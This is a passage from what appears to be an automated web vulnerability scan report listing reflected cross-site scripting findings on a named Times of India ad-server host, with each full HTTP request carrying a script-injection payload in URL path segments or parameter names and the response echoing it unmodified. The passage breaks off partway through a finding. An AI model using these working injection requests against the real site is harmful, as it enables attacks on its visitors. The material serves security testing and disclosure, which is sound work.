Support: http://adstil.indiatimes.com#OasDefault/3670000929000010THEADVER6209TOIR#Advertisement12Aug#Advertisement12Aug.html#0a87c#1313160034#422#Hc#Right1#www.timesofindia.com/TOI2009_City_Mum
...[SNIP]...
atimes.com/RealMedia/ads/adstream_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/11696994541/x32/OasDefault/3670000929000010THEADVER6209TOIR/Advert1x1Aug15/33323137376236613465363266323830?3a0bc"><script>alert(1)</script>41f3675278=1">
...[SNIP]...

6.38. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97947"><script>alert(1)</script>ce3dcfd89f2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com97947"><script>alert(1)</script>ce3dcfd89f2/TOI2009_City_Mumbai/index.html/1519539382@Right2? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:42:55 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 374
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com97947"><script>alert(1)</script>ce3dcfd89f2/TOI2009_City_Mumbai/index.html/641038821/Right2/default/empty.gif/33323137376236613465363265353630" target="_top">
...[SNIP]...

6.39. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afba1"><script>alert(1)</script>9f896aa4989 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbaiafba1"><script>alert(1)</script>9f896aa4989/index.html/1519539382@Right2? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:43:41 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 375
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbaiafba1"><script>alert(1)</script>9f896aa4989/index.html/1123754207/Right2/default/empty.gif/33323137376236613465363265353630" target="_top">
...[SNIP]...

6.40. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94167"><script>alert(1)</script>bd03bb75874 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html94167"><script>alert(1)</script>bd03bb75874/1519539382@Right2? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:44:20 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 375
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html94167"><script>alert(1)</script>bd03bb75874/2049555271/Right2/default/empty.gif/33323137376236613465363265353630" target="_top">
...[SNIP]...

6.41. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f499b"><script>alert(1)</script>879bf20c60b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/f499b"><script>alert(1)</script>879bf20c60b? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:45:05 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 377
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/f499b"><script>alert(1)</script>879bf20c60b/2047229998/UNKNOWN/default/empty.gif/33323137376236613465363265353630" target="_top">
...[SNIP]...

6.42. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9768"-alert(1)-"d9fd94cedaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2?&f9768"-alert(1)-"d9fd94cedaf=1 HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:40:26 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 5490
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<!--
Support: http://adstil.indiatimes.com#OasDefault/3670001065000060TIL6203TOIROSMre#82565#KitchenCombo-300x250.txt#41ba4#1211878677#422#S#Right2#www.timesofindia.com/TOI2009_City_Mumbai/index.htm
...[SNIP]...
m/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/540163553/Right2/OasDefault/3670001065000060TIL6203TOIROSMre/KitchenCombo-300x250.txt/33323137376236613465363265346430?&f9768"-alert(1)-"d9fd94cedaf=1", "OAS_AD_Right2", "width=300 height=250", "transparent", "clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" ,"6", "FinContentRight21");
           extFlashRight21.onreadystatechange = "";
       }

       extFlashRig
...[SNIP]...

6.43. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 269ed"><script>alert(1)</script>4afc035ada6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com269ed"><script>alert(1)</script>4afc035ada6/TOI2009_City_Mumbai/index.html/1679277654@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:40:12 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 374
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com269ed"><script>alert(1)</script>4afc035ada6/TOI2009_City_Mumbai/index.html/673336334/Right1/default/empty.gif/33323137376236613465363265346430" target="_top">
...[SNIP]...

6.44. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0219"><script>alert(1)</script>d7e170f4d3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbaib0219"><script>alert(1)</script>d7e170f4d3/index.html/1679277654@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:40:59 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 374
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbaib0219"><script>alert(1)</script>d7e170f4d3/index.html/2001034795/Right1/default/empty.gif/33323137376236613465363265346430" target="_top">
...[SNIP]...

6.45. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac330"><script>alert(1)</script>8bdbbc672e5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.htmlac330"><script>alert(1)</script>8bdbbc672e5/1679277654@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:41:39 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 375
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.htmlac330"><script>alert(1)</script>8bdbbc672e5/1242041443/Right1/default/empty.gif/33323137376236613465363265353630" target="_top">
...[SNIP]...

6.46. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1 [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73c99"><script>alert(1)</script>77fa4f67160 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/73c99"><script>alert(1)</script>77fa4f67160? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:42:24 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 377
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/73c99"><script>alert(1)</script>77fa4f67160/1220048631/UNKNOWN/default/empty.gif/33323137376236613465363265353630" target="_top">
...[SNIP]...

6.47. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7af5"><script>alert(1)</script>97dbefd87cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.comf7af5"><script>alert(1)</script>97dbefd87cc/TOI2009_City_Mumbai/index.html/1801219238@Right2? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:06:24 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 375
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.comf7af5"><script>alert(1)</script>97dbefd87cc/TOI2009_City_Mumbai/index.html/1388008418/Right2/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.48. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da1cd"><script>alert(1)</script>cfcbc39f7ea was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbaida1cd"><script>alert(1)</script>cfcbc39f7ea/index.html/1801219238@Right2? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:07:10 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 375
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbaida1cd"><script>alert(1)</script>cfcbc39f7ea/index.html/1588964645/Right2/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.49. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5b33"><script>alert(1)</script>10fd148a5ad was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.htmla5b33"><script>alert(1)</script>10fd148a5ad/1801219238@Right2? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:07:49 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 374
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.htmla5b33"><script>alert(1)</script>10fd148a5ad/447911435/Right2/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.50. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2 [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ef6c"><script>alert(1)</script>5dc7d71f8e3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/8ef6c"><script>alert(1)</script>5dc7d71f8e3? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:08:34 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 377
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/8ef6c"><script>alert(1)</script>5dc7d71f8e3/1259692194/UNKNOWN/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.51. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 604b5"><script>alert(1)</script>b89ca73124c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com604b5"><script>alert(1)</script>b89ca73124c/TOI2009_TOPICS/index.html/1982094345@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/topic/Xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs|O108EZ|O108FG|O108i0|O108ih; _iibeat_session=02f2ca4f-6c90-4fc2-993c-84fedfef7948

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:41:19 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 369
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com604b5"><script>alert(1)</script>b89ca73124c/TOI2009_TOPICS/index.html/967381076/Right1/default/empty.gif/33323137376236613465363266323830" target="_top">
...[SNIP]...

6.52. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2ba3"><script>alert(1)</script>da433ca3c57 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

